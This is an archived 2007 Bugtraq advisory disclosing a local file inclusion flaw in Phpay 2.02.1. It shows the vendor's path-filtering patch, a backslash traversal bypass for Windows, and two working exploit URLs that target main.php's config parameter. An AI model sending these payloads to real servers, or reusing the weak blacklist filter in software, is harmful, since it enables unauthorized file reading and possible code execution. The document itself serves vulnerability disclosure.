| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Date: 14 Dec 2007 22:03:52 -0000
From: th3.r00k.nospam@...k.gmail.com
To: bugtraq@...urityfocus.com
Subject: Phpay - Local File Inclusion
By Michael Brooks
Vulnerability Type:Local File Inclusion
Software: Phpay
Homepage:http://sourceforge.net/projects/phpay/
Version Affected:2.02.1
Phpay has been affected by multiple local file include flaws, as a result this patch was written:
$config = ereg_replace(":","", $config);
$config = trim(ereg_replace("../","", $config));
$config = trim(ereg_replace("/","", $config));
if (($config=="")|| (!eregi(".inc.php",$config))){$config="config.inc.php"; echo "<!--$config-->\n";}
if (!file_exists("$config")) { echo "panic: $config doesn't exist!! Did you backup it after installation? ..."; exit;}
require("./$config");
To bypass this patch backslashes can be used instead of forward slashes on windows systems.
Also .inc.php must exists *somewhere* in the string.
Local File Include for windows only:
http://localhost/phpayv2.02a/main.php?config=eregi.inc.php\\..\\admin\\.htaccess
or if magic_quotes_gpc is turned on:
http://localhost/phpayv2.02a/main.php?config=eregi.inc.php\..\admin\.htaccess
Remote code execution is accessible in the ./admin/ folder.
The admin folder *should* be protected by a .htaccess file similar to osCommerce2.
Vulnerable configuration:
A there is a call to extract($_GET) so the exploit will work regardless of register_globals. Using Linux is a very good fix for this issue.
Merry Christmas
Powered by blists - more mailing lists